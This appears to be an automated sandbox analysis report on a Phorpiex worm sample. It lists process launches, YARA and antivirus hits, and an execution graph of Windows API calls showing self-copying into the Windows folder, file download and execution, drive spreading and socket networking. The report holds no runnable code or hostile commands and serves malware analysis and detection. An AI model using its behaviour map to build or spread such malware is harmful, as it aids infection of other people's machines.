                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:18:31:06
                                                                                Start date:15/08/2022
                                                                                Path:C:\Users\user\Desktop\Id4zlrsrZ4.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\Id4zlrsrZ4.exe"
                                                                                Imagebase:0x400000
                                                                                File size:77312 bytes
                                                                                MD5 hash:ED2D7B25BB360CCCB4F0F6A4F8732D7A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000000.339631076.0000000000410000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000003.345540148.0000000000733000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Target ID:1
                                                                                Start time:18:31:08
                                                                                Start date:15/08/2022
                                                                                Path:C:\Windows\winrecsv.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\winrecsv.exe
                                                                                Imagebase:0x400000
                                                                                File size:77312 bytes
                                                                                MD5 hash:ED2D7B25BB360CCCB4F0F6A4F8732D7A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000000.345529527.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\winrecsv.exe, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 74%, ReversingLabs
                                                                                Reputation:low

                                                                                Target ID:5
                                                                                Start time:18:31:21
                                                                                Start date:15/08/2022
                                                                                Path:C:\Windows\winrecsv.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\winrecsv.exe"
                                                                                Imagebase:0x400000
                                                                                File size:77312 bytes
                                                                                MD5 hash:ED2D7B25BB360CCCB4F0F6A4F8732D7A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000000.377037453.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Target ID:7
                                                                                Start time:18:31:34
                                                                                Start date:15/08/2022
                                                                                Path:C:\Users\user\AppData\Local\Temp\509517324.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\509517324.exe
                                                                                Imagebase:0x10d0000
                                                                                File size:6656 bytes
                                                                                MD5 hash:A475E43527D7DC7D6F2D23BAD64FCC99
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 52%, Metadefender, Browse
                                                                                • Detection: 88%, ReversingLabs
                                                                                Reputation:low

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:1.1%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:16.4%
                                                                                  Total number of Nodes:1462
                                                                                  Total number of Limit Nodes:7
                                                                                  execution_graph 5053 40c240 5056 40df70 5053->5056 5055 40c261 5057 40df8f 5056->5057 5070 40e083 5056->5070 5058 408e60 __aligned_recalloc_base 7 API calls 5057->5058 5057->5070 5059 40dfb6 memcpy htons 5058->5059 5060 40e05c 5059->5060 5061 40e006 sendto 5059->5061 5062 408fb0 __aligned_recalloc_base 3 API calls 5060->5062 5063 40e025 InterlockedExchangeAdd 5061->5063 5064 40e058 5061->5064 5065 40e06b 5062->5065 5063->5061 5066 40e03b 5063->5066 5064->5060 5067 40e079 5064->5067 5065->5055 5069 408fb0 __aligned_recalloc_base 3 API calls 5066->5069 5068 408fb0 __aligned_recalloc_base 3 API calls 5067->5068 5068->5070 5071 40e04a 5069->5071 5070->5055 5071->5055 5072 40c2c0 5082 40e110 5072->5082 5074 40c34d 5076 40c2e8 InterlockedExchangeAdd 5077 40c32c WaitForSingleObject 5076->5077 5079 40c2ce 5076->5079 5078 40c345 5077->5078 5077->5079 5102 40e0a0 5078->5102 5079->5074 5079->5076 5079->5077 5094 409f60 EnterCriticalSection 5079->5094 5099 40a390 5079->5099 5083 408e40 7 API calls 5082->5083 5084 40e11b CreateEventA socket 5083->5084 5085 40e152 5084->5085 5086 40e157 5084->5086 5089 40e0a0 8 API calls 5085->5089 5087 40e1ba 5086->5087 5088 40e15d bind 5086->5088 5087->5079 5090 40e190 5088->5090 5091 40e19c CreateThread 5088->5091 5089->5086 5092 40e0a0 8 API calls 5090->5092 5091->5087 5093 40e195 5092->5093 5093->5079 5095 409f97 LeaveCriticalSection 5094->5095 5096 409f7f 5094->5096 5095->5079 5097 40ab90 3 API calls 5096->5097 5098 409f8a 5097->5098 5098->5095 5112 40a1a0 5099->5112 5103 40e0a4 5102->5103 5110 40e100 5102->5110 5104 40e0ac SetEvent WaitForSingleObject CloseHandle 5103->5104 5103->5110 5105 40e0d4 5104->5105 5111 40e0f0 5104->5111 5107 408fb0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5105->5107 5105->5111 5107->5105 5108 40e0fa 5109 408fb0 __aligned_recalloc_base 3 API calls 5108->5109 5109->5110 5110->5074 5120 409940 shutdown closesocket 5111->5120 5113 40abd0 3 API calls 5112->5113 5114 40a1ab 5113->5114 5115 40a1c7 lstrlenA 5114->5115 5116 40ae60 7 API calls 5115->5116 5117 40a1fd 5116->5117 5118 40a228 5117->5118 5119 408fb0 __aligned_recalloc_base 3 API calls 5117->5119 5118->5079 5119->5118 5120->5108 5513 405800 5514 405867 5513->5514 5516 405811 5513->5516 5515 405865 5514->5515 5517 40d890 60 API calls 5514->5517 5518 408fb0 __aligned_recalloc_base 3 API calls 5515->5518 5516->5515 5519 405820 StrChrA 5516->5519 5523 40d890 GetTickCount srand ExpandEnvironmentStringsW 5516->5523 5517->5515 5520 405892 5518->5520 5519->5516 5524 40d8de 5523->5524 5524->5524 5525 40d8fc mbstowcs rand rand wsprintfW InternetOpenW 5524->5525 5526 40db00 InternetCloseHandle Sleep 5525->5526 5527 40d995 InternetOpenUrlW 5525->5527 5530 40584f Sleep 5526->5530 5531 40db27 6 API calls 5526->5531 5528 40daf3 InternetCloseHandle 5527->5528 5529 40d9c4 CreateFileW 5527->5529 5528->5526 5532 40d9f3 InternetReadFile 5529->5532 5533 40dae6 CloseHandle 5529->5533 5530->5516 5531->5530 5534 40dba9 wsprintfW DeleteFileW Sleep 5531->5534 5535 40da46 CloseHandle wsprintfW DeleteFileW Sleep 5532->5535 5536 40da17 5532->5536 5533->5528 5537 40d580 20 API calls 5534->5537 5553 40d580 CreateFileW 5535->5553 5536->5535 5538 40da20 WriteFile 5536->5538 5540 40dbe9 5537->5540 5538->5532 5542 40dbf3 Sleep 5540->5542 5543 40dc27 DeleteFileW 5540->5543 5546 40d740 5 API calls 5542->5546 5543->5530 5544 40dad9 DeleteFileW 5544->5533 5545 40da9d Sleep 5547 40d740 5 API calls 5545->5547 5548 40dc0a 5546->5548 5549 40dab4 5547->5549 5548->5530 5550 40dc1d ExitProcess 5548->5550 5551 40dad0 5549->5551 5552 40dac8 ExitProcess 5549->5552 5551->5533 5554 40d6d3 5553->5554 5555 40d5c7 CreateFileMappingW 5553->5555 5558 40d6d9 CreateFileW 5554->5558 5559 40d72a 5554->5559 5556 40d5e8 MapViewOfFile 5555->5556 5557 40d6c9 CloseHandle 5555->5557 5560 40d607 GetFileSize 5556->5560 5561 40d6bf CloseHandle 5556->5561 5557->5554 5562 40d721 5558->5562 5563 40d6fb WriteFile CloseHandle 5558->5563 5559->5544 5559->5545 5564 40d623 5560->5564 5565 40d6b5 UnmapViewOfFile 5560->5565 5561->5557 5566 408fb0 __aligned_recalloc_base 3 API calls 5562->5566 5563->5562 5573 40b4c0 5564->5573 5565->5561 5566->5559 5569 40ae60 7 API calls 5570 40d66e 5569->5570 5570->5565 5571 408fb0 __aligned_recalloc_base 3 API calls 5570->5571 5572 40d6ab 5571->5572 5572->5565 5574 40af50 10 API calls 5573->5574 5575 40b4e4 5574->5575 5575->5565 5575->5569 5576 404000 5577 404009 memset GetModuleHandleW 5576->5577 5578 404042 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5577->5578 5578->5578 5579 404080 CreateWindowExW 5578->5579 5580 4040ab 5579->5580 5581 4040ad GetMessageA 5579->5581 5582 4040df ExitThread 5580->5582 5583 4040c1 TranslateMessage DispatchMessageA 5581->5583 5584 4040d7 5581->5584 5583->5581 5584->5577 5584->5582 5585 40bd00 5586 40bd17 5585->5586 5604 40bd6e 5585->5604 5587 40bd21 5586->5587 5588 40bd73 5586->5588 5589 40bdbd 5586->5589 5586->5604 5590 408e40 7 API calls 5587->5590 5592 40bd98 5588->5592 5593 40bd8b InterlockedDecrement 5588->5593 5618 40a890 5589->5618 5594 40bd2e 5590->5594 5595 408fb0 __aligned_recalloc_base 3 API calls 5592->5595 5593->5592 5607 40e440 5594->5607 5597 40bda4 5595->5597 5598 408fb0 __aligned_recalloc_base 3 API calls 5597->5598 5598->5604 5601 40bde3 5601->5604 5605 40a4f0 115 API calls 5601->5605 5623 40a990 5601->5623 5603 40bd5b InterlockedIncrement 5603->5604 5605->5601 5608 40bd40 5607->5608 5609 40e444 5607->5609 5611 409c30 5608->5611 5609->5608 5610 40e455 InterlockedIncrement 5609->5610 5610->5608 5612 409ab0 2 API calls 5611->5612 5613 409c3f 5612->5613 5614 409c49 5613->5614 5615 409c4d EnterCriticalSection 5613->5615 5614->5603 5614->5604 5616 409c6c LeaveCriticalSection 5615->5616 5616->5614 5619 40a8a3 5618->5619 5620 40a8cd memcpy 5618->5620 5621 408ea0 9 API calls 5619->5621 5620->5601 5622 40a8c4 5621->5622 5622->5620 5624 40a9b9 5623->5624 5625 40a9ae 5623->5625 5624->5625 5626 40a9d1 memmove 5624->5626 5625->5601 5626->5625 5627 405900 5628 405969 Sleep 5627->5628 5632 405980 5628->5632 5629 405a00 Sleep 5629->5628 5630 405998 Sleep wsprintfA 5634 40d7f0 InternetOpenA 5630->5634 5632->5629 5632->5630 5633 40d890 60 API calls 5632->5633 5633->5632 5635 40d816 InternetOpenUrlA 5634->5635 5636 40d888 5634->5636 5637 40d835 HttpQueryInfoA 5635->5637 5638 40d87e InternetCloseHandle 5635->5638 5636->5632 5639 40d874 InternetCloseHandle 5637->5639 5640 40d85e 5637->5640 5638->5636 5639->5638 5640->5639 5641 405106 5649 4050e8 5641->5649 5642 405228 Sleep 5642->5649 5643 405119 5660 404860 5643->5660 5646 405238 ExitThread 5647 405150 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5651 4051c6 wsprintfW 5647->5651 5652 4051db wsprintfW 5647->5652 5649->5642 5649->5643 5649->5646 5654 4048c0 GetLogicalDrives 5649->5654 5650 40514b 5651->5652 5666 404bd0 _chkstk 5652->5666 5657 4048ed 5654->5657 5655 404966 5655->5649 5656 4048fc RegOpenKeyExW 5656->5657 5658 40491e RegQueryValueExW 5656->5658 5657->5655 5657->5656 5659 40495a RegCloseKey 5657->5659 5658->5657 5658->5659 5659->5657 5661 4048b9 5660->5661 5662 40487c 5660->5662 5661->5647 5661->5650 5701 4047e0 GetDriveTypeW 5662->5701 5665 4048ab lstrcpyW 5665->5661 5667 404be7 5666->5667 5668 404bee 6 API calls 5666->5668 5667->5650 5669 404ca2 5668->5669 5670 404ce4 PathFileExistsW 5668->5670 5706 40d530 CreateFileW 5669->5706 5672 404d60 PathFileExistsW 5670->5672 5673 404cf5 PathFileExistsW 5670->5673 5677 404d71 5672->5677 5678 404db6 FindFirstFileW 5672->5678 5675 404d06 CreateDirectoryW 5673->5675 5676 404d28 PathFileExistsW 5673->5676 5675->5676 5680 404d19 SetFileAttributesW 5675->5680 5676->5672 5681 404d39 CopyFileW 5676->5681 5682 404d91 5677->5682 5683 404d79 5677->5683 5678->5667 5694 404ddd 5678->5694 5679 404cc5 SetFileAttributesW DeleteFileW 5679->5670 5680->5676 5681->5672 5686 404d51 SetFileAttributesW 5681->5686 5684 404980 3 API calls 5682->5684 5709 404980 CoInitialize CoCreateInstance 5683->5709 5688 404d8c SetFileAttributesW 5684->5688 5685 404e9f lstrcmpW 5689 404eb5 lstrcmpW 5685->5689 5685->5694 5686->5672 5688->5678 5689->5694 5691 405076 FindNextFileW 5691->5685 5692 405092 FindClose 5691->5692 5692->5667 5693 404efb lstrcmpiW 5693->5694 5694->5685 5694->5691 5694->5693 5695 404f62 PathMatchSpecW 5694->5695 5696 404fe0 PathFileExistsW 5694->5696 5700 404a90 11 API calls 5694->5700 5695->5694 5697 404f83 wsprintfW SetFileAttributesW DeleteFileW 5695->5697 5696->5694 5698 404ff6 wsprintfW wsprintfW 5696->5698 5697->5694 5698->5694 5699 405060 MoveFileExW 5698->5699 5699->5691 5700->5694 5702 404808 5701->5702 5704 40481a 5701->5704 5703 40481c QueryDosDeviceW 5702->5703 5702->5704 5703->5704 5705 404836 StrCmpNW 5703->5705 5704->5661 5704->5665 5705->5704 5707 404cae 5706->5707 5708 40d55f GetFileSize CloseHandle 5706->5708 5707->5670 5707->5679 5708->5707 5710 4049b6 5709->5710 5712 4049f2 5709->5712 5711 4049c0 wsprintfW 5710->5711 5710->5712 5711->5712 5712->5688 5713 40f088 5714 40f090 5713->5714 5716 40f144 5714->5716 5719 40f2cd 5714->5719 5717 40f0c9 5717->5716 5723 40f1b8 RtlUnwind 5717->5723 5720 40f2e2 5719->5720 5722 40f2fe 5719->5722 5721 40f36d NtQueryVirtualMemory 5720->5721 5720->5722 5721->5722 5722->5717 5724 40f1d0 5723->5724 5724->5717 5121 404fcb 5134 404ecb 5121->5134 5122 404f62 PathMatchSpecW 5124 404f83 wsprintfW SetFileAttributesW DeleteFileW 5122->5124 5122->5134 5123 404fe0 PathFileExistsW 5126 404ff6 wsprintfW wsprintfW 5123->5126 5123->5134 5124->5134 5125 405076 FindNextFileW 5128 405092 FindClose 5125->5128 5129 404e9f lstrcmpW 5125->5129 5127 405060 MoveFileExW 5126->5127 5126->5134 5127->5125 5130 40509f 5128->5130 5131 404eb5 lstrcmpW 5129->5131 5129->5134 5131->5134 5133 404efb lstrcmpiW 5133->5134 5134->5122 5134->5123 5134->5125 5134->5133 5135 404a90 CreateDirectoryW wsprintfW FindFirstFileW 5134->5135 5136 404ae5 lstrcmpW 5135->5136 5137 404bbf 5135->5137 5138 404afb lstrcmpW 5136->5138 5142 404b11 5136->5142 5137->5134 5139 404b13 wsprintfW wsprintfW 5138->5139 5138->5142 5141 404b76 MoveFileExW 5139->5141 5139->5142 5140 404b8c FindNextFileW 5140->5136 5143 404ba8 FindClose RemoveDirectoryW 5140->5143 5141->5140 5142->5140 5143->5137 5725 40908e 5726 408fb0 __aligned_recalloc_base 3 API calls 5725->5726 5729 40904d 5726->5729 5727 409062 5728 408e60 __aligned_recalloc_base 7 API calls 5728->5729 5729->5727 5729->5728 5730 409064 memcpy 5729->5730 5730->5729 5284 40be50 5290 40f030 5284->5290 5287 40be90 5288 40be77 WaitForSingleObject 5294 40e480 5288->5294 5291 40f037 5290->5291 5293 40be66 5290->5293 5291->5293 5315 40eea0 5291->5315 5293->5287 5293->5288 5295 40e488 5294->5295 5314 40e5b2 5294->5314 5296 40e494 EnterCriticalSection 5295->5296 5295->5314 5297 40e530 LeaveCriticalSection SetEvent 5296->5297 5300 40e4ab 5296->5300 5298 40e563 5297->5298 5299 40e54b 5297->5299 5342 40c040 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 5298->5342 5301 40e551 PostQueuedCompletionStatus 5299->5301 5300->5297 5303 40e4bc InterlockedDecrement 5300->5303 5305 40e4d5 InterlockedExchangeAdd 5300->5305 5311 40e51b InterlockedDecrement 5300->5311 5301->5298 5301->5301 5303->5300 5304 40e56e 5351 40c180 5304->5351 5305->5300 5307 40e4e8 InterlockedIncrement 5305->5307 5336 40ead0 WSARecv 5307->5336 5311->5300 5312 40e59f DeleteCriticalSection 5313 408fb0 __aligned_recalloc_base 3 API calls 5312->5313 5313->5314 5314->5287 5316 408e40 7 API calls 5315->5316 5317 40eeab 5316->5317 5318 40f024 5317->5318 5319 40eeb8 GetSystemInfo InitializeCriticalSection CreateEventA 5317->5319 5318->5293 5320 40eef6 CreateIoCompletionPort 5319->5320 5321 40f01f 5319->5321 5320->5321 5322 40ef0f 5320->5322 5323 40e480 36 API calls 5321->5323 5324 40bea0 8 API calls 5322->5324 5323->5318 5325 40ef14 5324->5325 5325->5321 5326 40ef1f WSASocketA 5325->5326 5326->5321 5327 40ef3d setsockopt htons bind 5326->5327 5327->5321 5328 40efa6 listen 5327->5328 5328->5321 5329 40efba WSACreateEvent 5328->5329 5329->5321 5330 40efc7 WSAEventSelect 5329->5330 5330->5321 5331 40efd9 5330->5331 5332 40efff 5331->5332 5333 40bf50 17 API calls 5331->5333 5334 40bf50 17 API calls 5332->5334 5333->5331 5335 40f014 5334->5335 5335->5293 5337 40eb52 5336->5337 5338 40eb0e 5336->5338 5337->5300 5339 40eb10 WSAGetLastError 5338->5339 5340 40eb24 Sleep WSARecv 5338->5340 5341 40eb5b 5338->5341 5339->5337 5339->5338 5340->5337 5340->5339 5341->5300 5343 40c076 InterlockedExchangeAdd 5342->5343 5344 40c159 GetCurrentThread SetThreadPriority 5342->5344 5343->5344 5349 40c090 5343->5349 5344->5304 5345 40c0a9 EnterCriticalSection 5345->5349 5346 40c117 LeaveCriticalSection 5348 40c12e 5346->5348 5346->5349 5347 40c0f3 WaitForSingleObject 5347->5349 5348->5344 5349->5344 5349->5345 5349->5346 5349->5347 5349->5348 5350 40c14c Sleep 5349->5350 5350->5349 5352 40c202 CloseHandle CloseHandle WSACloseEvent 5351->5352 5353 40c18c EnterCriticalSection 5351->5353 5360 409940 shutdown closesocket 5352->5360 5354 40c1a8 5353->5354 5355 40c1d0 LeaveCriticalSection DeleteCriticalSection 5354->5355 5356 40c1bb CloseHandle 5354->5356 5357 408fb0 __aligned_recalloc_base 3 API calls 5355->5357 5356->5354 5358 40c1f6 5357->5358 5359 408fb0 __aligned_recalloc_base 3 API calls 5358->5359 5359->5352 5360->5312 5144 40bc50 5146 40bc54 5144->5146 5145 409f60 5 API calls 5145->5146 5146->5145 5147 40bc70 WaitForSingleObject 5146->5147 5149 40bc95 5146->5149 5150 40bab0 InterlockedExchangeAdd 5146->5150 5147->5146 5147->5149 5151 40bacd 5150->5151 5162 40bac6 5150->5162 5167 40b9c0 5151->5167 5154 40baed InterlockedIncrement 5164 40baf7 5154->5164 5155 40a390 13 API calls 5155->5164 5156 40bb20 5174 409820 inet_ntoa 5156->5174 5158 40bb2c 5159 40bbf0 InterlockedDecrement 5158->5159 5189 409940 shutdown closesocket 5159->5189 5160 40b8f0 6 API calls 5160->5164 5162->5146 5163 408e60 __aligned_recalloc_base 7 API calls 5163->5164 5164->5155 5164->5156 5164->5159 5164->5160 5164->5163 5166 408fb0 __aligned_recalloc_base 3 API calls 5164->5166 5175 40a4f0 5164->5175 5166->5164 5168 40b9cd socket 5167->5168 5169 40b9e2 htons connect 5168->5169 5170 40ba3f 5168->5170 5169->5170 5171 40ba2a 5169->5171 5170->5168 5172 40ba33 5170->5172 5190 409940 shutdown closesocket 5171->5190 5172->5154 5172->5162 5174->5158 5186 40a501 5175->5186 5177 40a51f 5179 408fb0 __aligned_recalloc_base 3 API calls 5177->5179 5180 40a884 5179->5180 5180->5164 5181 40a240 20 API calls 5181->5186 5184 40a390 13 API calls 5184->5186 5185 409f40 25 API calls 5185->5186 5186->5177 5186->5181 5186->5184 5186->5185 5191 40a410 5186->5191 5198 409fb0 EnterCriticalSection 5186->5198 5203 405430 5186->5203 5208 405470 5186->5208 5213 405340 5186->5213 5220 4053a0 5186->5220 5189->5162 5190->5172 5192 40a421 lstrlenA 5191->5192 5193 40ae60 7 API calls 5192->5193 5195 40a43f 5193->5195 5194 40a4cf 5194->5186 5195->5192 5197 40a44b 5195->5197 5196 408fb0 __aligned_recalloc_base 3 API calls 5196->5194 5197->5194 5197->5196 5199 409fc8 5198->5199 5200 40a004 LeaveCriticalSection 5199->5200 5223 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5199->5223 5200->5186 5202 409ff3 5202->5200 5224 4053d0 5203->5224 5206 405469 5206->5186 5207 40bf50 17 API calls 5207->5206 5209 4053d0 65 API calls 5208->5209 5210 40548f 5209->5210 5211 4054bc 5210->5211 5234 4052f0 5210->5234 5211->5186 5237 4044c0 EnterCriticalSection 5213->5237 5215 40535a 5216 40538d 5215->5216 5242 405250 5215->5242 5216->5186 5219 408fb0 __aligned_recalloc_base 3 API calls 5219->5216 5249 404580 EnterCriticalSection 5220->5249 5222 4053c2 5222->5186 5223->5202 5227 4053e3 5224->5227 5225 405420 5225->5206 5225->5207 5227->5225 5228 4043d0 EnterCriticalSection 5227->5228 5229 40b4f0 63 API calls 5228->5229 5230 4043f0 5229->5230 5231 40449e LeaveCriticalSection 5230->5231 5232 408fb0 __aligned_recalloc_base 3 API calls 5230->5232 5231->5227 5233 40449b 5232->5233 5233->5231 5235 40a1a0 13 API calls 5234->5235 5236 405335 5235->5236 5236->5211 5239 4044de 5237->5239 5238 40456a LeaveCriticalSection 5238->5215 5239->5238 5240 409020 8 API calls 5239->5240 5241 40453c 5240->5241 5241->5238 5243 408e60 __aligned_recalloc_base 7 API calls 5242->5243 5244 405262 memcpy 5243->5244 5245 40a1a0 13 API calls 5244->5245 5246 4052cc 5245->5246 5247 408fb0 __aligned_recalloc_base 3 API calls 5246->5247 5248 4052db 5247->5248 5248->5219 5273 40b550 5249->5273 5252 4047be LeaveCriticalSection 5252->5222 5253 40b4f0 63 API calls 5255 4045bb 5253->5255 5254 4046d3 5256 4046fc 5254->5256 5257 4040f0 15 API calls 5254->5257 5255->5252 5255->5254 5259 408fb0 __aligned_recalloc_base 3 API calls 5255->5259 5258 408fb0 __aligned_recalloc_base 3 API calls 5256->5258 5257->5256 5260 40471d 5258->5260 5261 404632 5259->5261 5260->5252 5262 40472c CreateFileW 5260->5262 5263 409020 8 API calls 5261->5263 5262->5252 5264 40474f 5262->5264 5265 404642 5263->5265 5268 4047aa FlushFileBuffers CloseHandle 5264->5268 5269 40476c WriteFile 5264->5269 5266 408fb0 __aligned_recalloc_base 3 API calls 5265->5266 5267 404669 5266->5267 5270 40ae60 7 API calls 5267->5270 5268->5252 5269->5264 5271 4046a0 5270->5271 5272 4058a0 10 API calls 5271->5272 5272->5254 5276 40aaa0 5273->5276 5281 40aab3 5276->5281 5277 409020 8 API calls 5277->5281 5278 40aacd 5280 408fb0 __aligned_recalloc_base 3 API calls 5278->5280 5279 40aa00 62 API calls 5279->5281 5282 4045a4 5280->5282 5281->5277 5281->5278 5281->5279 5283 406920 61 API calls 5281->5283 5282->5252 5282->5253 5283->5281 5361 40edd0 GetQueuedCompletionStatus 5362 40ee12 5361->5362 5367 40ee88 5361->5367 5363 40ee17 WSAGetOverlappedResult 5362->5363 5368 40ebe0 5362->5368 5363->5362 5365 40ee39 WSAGetLastError 5363->5365 5365->5362 5366 40ee53 GetQueuedCompletionStatus 5366->5362 5366->5367 5369 40ed72 InterlockedDecrement setsockopt closesocket 5368->5369 5370 40ebf4 5368->5370 5371 40ecb9 5369->5371 5370->5369 5372 40ebfc 5370->5372 5371->5366 5388 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5372->5388 5374 40ec01 InterlockedExchange 5375 40ec18 5374->5375 5376 40ecce 5374->5376 5375->5371 5379 40ec29 InterlockedDecrement 5375->5379 5380 40ec3c InterlockedDecrement InterlockedExchangeAdd 5375->5380 5377 40ece7 5376->5377 5378 40ecd7 InterlockedDecrement 5376->5378 5381 40ecf2 5377->5381 5382 40ed07 InterlockedDecrement 5377->5382 5378->5366 5379->5366 5383 40ecaf 5380->5383 5397 40e960 WSASend 5381->5397 5385 40ed69 5382->5385 5389 40eb70 5383->5389 5385->5366 5386 40ecfe 5386->5366 5388->5374 5390 40eb80 InterlockedExchangeAdd 5389->5390 5391 40eb7c 5389->5391 5392 40ebd3 5390->5392 5393 40eb97 InterlockedIncrement 5390->5393 5391->5371 5392->5371 5394 40ead0 4 API calls 5393->5394 5395 40ebc6 5394->5395 5395->5392 5396 40ebcc InterlockedDecrement 5395->5396 5396->5392 5398 40e9d0 5397->5398 5399 40e992 WSAGetLastError 5397->5399 5398->5386 5399->5398 5400 40e99f 5399->5400 5401 40e9d6 5400->5401 5402 40e9a6 Sleep WSASend 5400->5402 5401->5386 5402->5398 5402->5399 5731 40f090 5732 40f144 5731->5732 5733 40f0ae 5731->5733 5734 40f2cd NtQueryVirtualMemory 5733->5734 5736 40f0c9 5734->5736 5735 40f1b8 RtlUnwind 5735->5736 5736->5732 5736->5735 5737 40e290 5738 40e2a7 5737->5738 5744 40e320 5737->5744 5739 40e2b7 5738->5739 5740 40e2d5 EnterCriticalSection 5738->5740 5741 40e30c LeaveCriticalSection DeleteCriticalSection 5740->5741 5745 40e2ed 5740->5745 5742 408fb0 __aligned_recalloc_base 3 API calls 5741->5742 5742->5744 5743 408fb0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5743->5745 5745->5743 5746 40e30b 5745->5746 5746->5741 5747 40b890 5752 40b830 5747->5752 5750 40b830 send 5751 40b8be 5750->5751 5753 40b841 send 5752->5753 5754 40b875 5753->5754 5755 40b85e 5753->5755 5754->5750 5754->5751 5755->5753 